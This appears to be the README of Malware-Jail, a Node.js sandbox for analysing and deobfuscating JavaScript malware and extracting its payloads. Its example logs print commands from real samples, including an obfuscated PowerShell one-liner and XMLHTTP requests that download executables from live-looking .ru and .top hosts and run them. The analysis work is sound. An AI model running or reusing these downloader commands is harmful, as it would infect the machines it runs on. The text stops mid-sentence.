Malware-Jail: a tool for JavaScript malware analysis, deobfuscation and payload extraction

Malware-Jail is a sandbox for semi-automatic JavaScript malware analysis, deobfuscation and payload extraction. It is written for Node.js.

It works on any operating system. Developed and tested on Linux with Node.js v6.6.0.

Note: because some ES6 features are used, you will need Node.js >= 6.x.

Malware-Jail is built on Node's 'vm' sandbox. It currently implements the Windows Scripting Host (WScript) context in env/wscript.js, at least the part that malware uses frequently. The Internet browser context is partially implemented in env/browser.js.

    How to install Malware-Jail

    You will need Node.js and npm installed, because malware-jail depends on minimist, iconv-lite and entities.

    Fetch from GitHub

    Fetch the source with git:

    git clone https://github.com/HynekPetrak/malware-jail.git
    cd malware-jail
    

    Then install all dependencies (minimist, entities, iconv-lite) with:

    npm install
    

    Usage

    bash@linux# node jailme.js -h -b list
    7 May 20:54:52 - mailware-jail, a malware sandbox ver. 0.19
    7 May 20:54:52 - ------------------------
    7 May 20:54:52 - Usage: node jailme.js  [[-e file1] [-e file2] .. ] [-c ./config.json] 
    7 May 20:54:52 -                [-o ofile] [-b id] 
    7 May 20:54:52 -                [-s odir] [--down] [malware1 [malware2] .. ]
    7 May 20:54:52 -        -c config .. use alternative config file, preceed with ./
    7 May 20:54:52 -        -e ifile ... js that simulates specific environment
    7 May 20:54:52 -        -o ofile ... name of the file where sandbox shall be dumped at the end
    7 May 20:54:52 -        -s odir  ... output directory for generated files (malware payload)
    7 May 20:54:52 -        -b id    ... browser type, use -b list for possible values
    7 May 20:54:52 -        -t msecs ... number of miliseconds before terminating execution, default 1 minute
    7 May 20:54:52 -        --trace  ... print stack trace with every log line
    7 May 20:54:52 -        --down   ... allow downloading malware payloads from remote servers
    7 May 20:54:52 -        --h404   ... on download return always HTTP/404
    7 May 20:54:52 -        malware  ... js with the malware code
    7 May 20:54:52 - If no arguments are specified the default values are taken from config.json
    7 May 20:54:52 - Possible -b values: [ 'IE11_W10', 'IE8', 'IE7', 'iPhone', 'Firefox', 'Chrome' ]
    

    You can find a disabled malware sample in the malware folder. Run the analysis with:

    node jailme.js -c ./config_wscript_only.json --down=y malware/example.js
    

    Internet browser based malware can be tested with:

    node jailme.js -b IE11_W10 malware/example_browser.js
    

    At the end of the analysis, the complete sandbox context is dumped to the 'sandbox_dump_after.json' file.

    You may want to examine the following entries of 'sandbox_dump_after.json':

    • eval_calls - array of all arguments passed to eval() calls. Useful if eval() is used for deobfuscation.
    • wscript_saved_files - contents of all files the malware attempted to drop. The actual files are also saved to the output/ directory.
    • wscript_urls - all URLs the malware intended to GET or POST.
    • wscript_objects - WScript or ActiveX object creations.

    'sandbox_dump_after.json' uses JSONPath, implemented by JSON-js/cycle.js, to store duplicate or cyclic references to the same object.

    Sample output

    bash@linux# node jailme.js malware/example.js
    11 Jan 00:06:24 - Malware sandbox ver. 0.2
    11 Jan 00:06:24 - ------------------------
    11 Jan 00:06:24 - Sandbox environment sequence: env/eval.js,env/wscript.js
    11 Jan 00:06:24 - Malware files: malware/example.js
    11 Jan 00:06:24 - Output file for sandbox dump: sandbox_dump_after.json
    11 Jan 00:06:24 - Output directory for generated files: output/
    11 Jan 00:06:24 - ==> Preparing Sandbox environment.
    11 Jan 00:06:24 -  => Executing: env/eval.js
    11 Jan 00:06:24 - Preparing sandbox to intercept eval() calls.
    11 Jan 00:06:24 -  => Executing: env/wscript.js
    11 Jan 00:06:24 - Preparing sandbox to emulate WScript environment.
    11 Jan 00:06:24 - ==> Executing malware file(s).
    11 Jan 00:06:24 -  => Executing: malware/example.js
    11 Jan 00:06:24 - ActiveXObject(WScript.Shell)
    11 Jan 00:06:24 - Created: WScript.Shell[1]
    11 Jan 00:06:24 - WScript.Shell[1].ExpandEnvironmentStrings(%TEMP%)
    11 Jan 00:06:24 - ActiveXObject(MSXML2.XMLHTTP)
    11 Jan 00:06:24 - Created: MSXML2.XMLHTTP[2]
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].open(POST,http://EXAMPLE.COM/redir.php,false)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].setRequestHeader(Content-Type, application/x-www-form-urlencoded)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2].send(iTlOlnxhMXnM=0.588860877091065&jndj=IT0601)
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Not sending data, if you want to interract with remote server, set --down=y
    11 Jan 00:06:24 - MSXML2.XMLHTTP[2] Calling onreadystatechange() with dummy data
    11 Jan 00:06:24 - ActiveXObject(ADODB.Stream)
    11 Jan 00:06:24 - Created: ADODB_Stream[3]
    11 Jan 00:06:24 - ADODB_Stream[3].Open()
    11 Jan 00:06:24 - ADODB_Stream[3].Write(str) - 10001 bytes
    11 Jan 00:06:24 - ADODB_Stream[3].SaveToFile(%TEMP%57020551.dll, 2)
    11 Jan 00:06:24 - WScript.Shell[1].Exec(rundll32 %TEMP%57020551.dll, DllRegisterServer)
    11 Jan 00:06:24 - ADODB_Stream[3].Close()
    11 Jan 00:08:42 - ==> Script execution finished, dumping sandbox environment to a file.
    11 Jan 00:08:42 - Saving: output/_TEMP__49629482.dll
    11 Jan 00:08:42 - Saving: output/_TEMP__38611354.pdf
    11 Jan 00:08:42 - Generated file saved
    11 Jan 00:08:42 - Generated file saved
    11 Jan 00:08:42 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    In the example above, the payload has been extracted to output/_TEMP__49629482.dll and output/_TEMP__38611354.pdf.

    Examples

    The malware folder contains real-world malware samples. Most of them were downloaded from https://malwr.com.

    Example: analysis of Wileen.js

    Taking a malicious script from malwr.com: Wileen.js

    Apparently the malware does not run when executed from a browser:

    if (typeof document == "undefined") {

    Therefore you may want to use an alternative config file that does not load the browser/DOM components:

    node jailme.js --down=y -c ./config_wscript_only.json  malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
    

    Interesting use of PowerShell:

    1 Oct 13:05:34 -  => Executing: malware/20161001/a6dfd6b83d46702c0b408bd5f669e08c785cd12fdd515fe469595e2a3d44ddc4.js
    1 Oct 13:05:34 - ActiveXObject(WScRipT.SHEll)
    1 Oct 13:05:34 - Created: WScript.Shell[1]
    1 Oct 13:05:34 - WScript.Shell[1].Run(cmD.EXE /c POWE^R^s^he^lL.eXE     -ExEc^U^Tio^n^p^oLIC^y^   B^Y^pas^S -NOpro^Fi^L^e^    -^W^InD^Ow^sT^yle^  HI^ddeN^  (^Ne^W^-^OBJ^ecT^     S^YST^EM.net.Webc^L^I^E^n^T^).^dOWn^L^Oa^d^fI^lE^(^'http://click.doubledating.ru/js/boxun4.bin','%appdatA%.exE')^;^stA^Rt-^p^rO^c^eS^s  ^'%aPpdata%.eXe', false, undefined)
    1 Oct 13:05:34 - ==> Cleaning up sandbox.
    1 Oct 13:05:34 - ==> Script execution finished, dumping sandbox environment to a file.
    1 Oct 13:05:34 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    Example: analysis of ORDER-10455.js

    Taking malicious JavaScript from malwr.com: ORDER-10455.js

    First run it without interacting with remote servers:

    node jailme.js malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js
    

    you get something like:

    ... 
    29 Sep 23:17:21 - Calling eval() no.: 5
    29 Sep 23:17:21 - ActiveXObject(MSXML2.XMLHTTP)
    29 Sep 23:17:21 - Created: MSXML2.XMLHTTP[9]
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].open(GET,http://caopdjow.top/user.php?f=0.dat,false)
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined)
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9] Not sending data, if you want to interact with remote server, set --down=y
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].responseBody = 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)'
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status="200"
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].send(undefined) finished
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].status.get() => 200
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - ActiveXObject(Scripting.FileSystemObject)
    29 Sep 23:17:21 - Scripting.FileSystemObject[10] created.
    29 Sep 23:17:21 - Scripting.FileSystemObject[10].GetSpecialFolder(2)
    29 Sep 23:17:21 - ActiveXObject(ADODB.Stream)
    29 Sep 23:17:21 - Created: ADODB_Stream[11]
    29 Sep 23:17:21 - ADODB_Stream[11].Open()
    29 Sep 23:17:21 - ADODB_Stream[11].Type="1"
    29 Sep 23:17:21 - ADODB_Stream[11].content="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)"
    29 Sep 23:17:21 - ADODB_Stream[11].Write(str) - 10000 bytes
    29 Sep 23:17:21 - ADODB_Stream[11].size="10000"
    29 Sep 23:17:21 - ADODB_Stream[11].Position = '0'
    29 Sep 23:17:21 - ADODB_Stream[11].SaveToFile(Special_Folder__2w8z05i7y2.exe, 2)
    29 Sep 23:17:21 - ADODB_Stream[11].content.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - ADODB_Stream[11].Close()
    29 Sep 23:17:21 - ActiveXObject(WScript.Shell)
    29 Sep 23:17:21 - Created: WScript.Shell[12]
    29 Sep 23:17:21 - WScript.Shell[12].Run(Special_Folder__2w8z05i7y2.exe, undefined, undefined)
    29 Sep 23:17:21 - Returning: 'undefined'
    29 Sep 23:17:21 - ==> Cleaning up sandbox.
    29 Sep 23:17:21 - ==> Script execution finished, dumping sandbox environment to a file.
    29 Sep 23:17:21 - MSXML2.XMLHTTP[9].ResponseBody.get() => aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ... (truncated)
    29 Sep 23:17:21 - Saving: output/Special_Folder__2_w8z05i7y2.exe
    29 Sep 23:17:21 - Generated file saved
    29 Sep 23:17:21 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    It seems to be a "standard" deobfuscation behaviour whose end goal is to download an exe binary and execute it.

    If we want to get the actual payload, let's run it with '--down=y':

    node jailme.js --down=y  malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.js > malware/20160929/416e32e1b22ecb8f360ff841b87d77ac9450fda24458ce4e70abb35ff4d242a3.out
    

    Example: analysis of Norri.js

    Taking malicious JavaScript from malwr.com: Norri.js

    Run:

    node jailme.js --down=y malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
    

    you get:

    30 Sep 01:02:11 -  => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
    30 Sep 01:02:11 - Strict mode: false
    30 Sep 01:02:11 - Calling eval() no.: 1
    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
    30 Sep 01:02:11 - Created: WScript.Shell[9]
    30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
    30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
    30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
    30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
    30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
    30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
    30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
    30 Sep 01:02:11 - Created: WScript.Shell[12]
    30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
    30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
    30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
    30 Sep 01:02:11 - Created: ADODB_Stream[14]
    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
    30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async="false"
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
    30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status="200"
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
    30 Sep 01:02:15 - ADODB_Stream[14].type="1"
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:15 - ADODB_Stream[14].Open()
    30 Sep 01:02:15 - ADODB_Stream[14].content="MZ?@?!?L?!This program cannot be ... (truncated)"
    30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
    30 Sep 01:02:15 - ADODB_Stream[14].size="196608"
    30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
    30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:15 - ADODB_Stream[14].Close()
    30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
    30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
    30 Sep 01:02:15 - ==> Cleaning up sandbox.
    30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
    30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
    30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
    30 Sep 01:02:16 - Generated file saved
    30 Sep 01:02:16 - The sandbox context has been  saved to: sandbox_dump_after.json
    

    The behaviour is evident from the log. The payload was extracted to the output/TemporaryFolder_TempFile[15] file.

    Example: analysis of Angler EK

    Download and extract Angler EK from a pcap file at ANGLER EK SENDS CRYPTOWALL into malware/angler/angler_full.html.

    Strip the non-Angler part and save it as malware/angler/angler_stripped.html.

    To remove